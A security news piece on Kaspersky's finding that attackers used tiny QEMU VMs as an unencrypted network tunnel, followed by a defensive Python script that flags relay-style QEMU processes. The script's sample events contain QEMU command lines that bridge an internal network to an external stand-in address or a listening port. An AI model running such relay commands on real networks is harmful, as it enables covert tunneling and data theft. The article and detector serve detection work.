Researchers at Kaspersky, while investigating suspicious network activity in the infrastructure of an unnamed company, found that the open-source emulator QEMU had been abused as a data tunneling tool. They documented the incident in a published analysis.
Instead of well-known tunneling tools such as Chisel, FRP, ligolo, ngrok, or Plink, which monitoring tools are far more likely to flag, the attackers chose QEMU. Among its network backends, QEMU can attach a virtual machine's network interface to a plain TCP or UDP socket, so a QEMU process can relay traffic in a way that conventional monitoring tools do not expect from a virtualization binary. Access to the compromised company was obtained through strategically placed QEMU virtual machines, which pivoted between network segments and ultimately tunneled communication out to the internet.

It is important to note that the attackers sacrificed encryption for stealth: the tunneled data was sent in the clear so that it would blend in with ordinary traffic rather than stand out as an encrypted tunnel. The virtual machines were started with only 1 MB of allocated RAM, which minimized their footprint on the servers and made them hard to spot; a VM that small has no room to run a guest operating system and served purely as a network relay. The attackers reached the corporate infrastructure from a cloud server running Kali Linux. According to the researchers, this was the first time they had seen the QEMU virtualization platform used for this purpose.

Detailed and continuous network monitoring, together with a vigilant SOC team, is crucial to catching similar attacks. Monitoring for the installation and execution of tools that have no business in the company's infrastructure, such as QEMU on production servers, is another worthwhile control.
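As an added example (not code from the original article or from Kaspersky), the following Python script shows the kind of endpoint-side check a SOC could run over process-creation events to surface QEMU instances that look like network relays rather than real virtual machines. It flags a qemu-system-* process that uses the `-netdev socket` backend and either has a tiny `-m` memory allocation or no bootable media at all. The events, hostnames, usernames and command lines below are constructed samples for illustration and are not the command lines from the incident; the 16 MB threshold is an assumption chosen so that any guest too small to boot an OS is caught.

```python
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample process-creation events (hypothetical, not from the incident).
SAMPLE_EVENTS = [
    {"host": "srv-db-01", "user": "svc_backup",
     "cmdline": "qemu-system-x86_64 -m 1M -netdev user,id=lan,restrict=off "
                "-netdev socket,id=sock,connect=203.0.113.10:443 "
                "-netdev hubport,id=p1,hubid=0,netdev=lan "
                "-netdev hubport,id=p2,hubid=0,netdev=sock -nographic"},
    {"host": "dev-ws-07", "user": "alice",   # legitimate developer VM
     "cmdline": "qemu-system-x86_64 -m 4096 -enable-kvm -hda ubuntu.qcow2 "
                "-netdev user,id=n0 -device e1000,netdev=n0"},
    {"host": "srv-web-03", "user": "SYSTEM",  # Windows host, listening relay
     "cmdline": "C:\\Tools\\qemu-system-x86_64.exe -m 1M "
                "-netdev socket,id=s0,listen=:443 -netdev user,id=u0,restrict=off -nographic"},
    {"host": "build-01", "user": "ci", "cmdline": "python3 -m pytest tests/"},
]

BINARY_RE = re.compile(r"(^|[\\/])qemu-system-[\w-]+(\.exe)?$", re.IGNORECASE)
MEM_RE = re.compile(r"^(\d+)([kKmMgG]?)$")
# Any of these flags gives the guest something to boot from.
MEDIA_FLAGS = {"-hda", "-hdb", "-drive", "-cdrom", "-kernel", "-initrd", "-bios", "-pflash"}
TINY_MEMORY_MB = 16  # assumed threshold: no real guest OS boots below this


def mem_mb(value):
    """Convert a QEMU -m argument (default unit MB, optional K/M/G suffix) to MB."""
    m = MEM_RE.match(value)
    if not m:
        return None
    n, unit = int(m.group(1)), m.group(2).upper()
    return {"": n, "M": n, "G": n * 1024, "K": n / 1024}[unit]


@dataclass
class Finding:
    host: str
    user: str
    indicators: list = field(default_factory=list)
    peers: list = field(default_factory=list)  # remote ends of socket backends

    @property
    def suspicious(self):
        # A socket backend alone is legitimate in nested-VM setups; combine it
        # with evidence that the "VM" cannot actually run anything.
        return "socket_netdev" in self.indicators and (
            "tiny_memory" in self.indicators or "no_boot_media" in self.indicators)


def analyze(event):
    """Return a Finding for a qemu-system process, or None for anything else."""
    # posix=False keeps Windows backslashes intact instead of treating them as escapes.
    argv = shlex.split(event["cmdline"], posix=False)
    if not argv or not BINARY_RE.search(argv[0]):
        return None
    finding = Finding(host=event["host"], user=event["user"])
    saw_media = False
    for i, arg in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if arg == "-m":
            mb = mem_mb(nxt)
            if mb is not None and mb <= TINY_MEMORY_MB:
                finding.indicators.append("tiny_memory")
        elif arg == "-netdev" and nxt.startswith("socket,"):
            finding.indicators.append("socket_netdev")
            for kv in nxt.split(",")[1:]:
                key, _, val = kv.partition("=")
                if key in ("connect", "listen", "mcast", "udp"):
                    finding.peers.append(f"{key}={val}")
        elif arg == "-nographic":
            finding.indicators.append("headless")
        elif arg in MEDIA_FLAGS:
            saw_media = True
    if not saw_media:
        finding.indicators.append("no_boot_media")
    return finding


def scan(events):
    """Return only the findings worth raising to an analyst."""
    return [f for f in map(analyze, events) if f is not None and f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"ALERT {f.host} user={f.user} indicators={f.indicators} peers={f.peers}")
```

Running the script flags the two relay-style processes (the connecting one on srv-db-01 and the listening one on srv-web-03) and leaves the developer's 4 GB VM alone. The `peers` field gives the analyst the remote address or listening port to pivot on in network telemetry; since QEMU's TCP socket backend carries raw guest Ethernet frames without any encryption, a connection on port 443 that never performs a TLS handshake is a complementary network-side signal.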
If you have concerns about your virtual security, please contact us.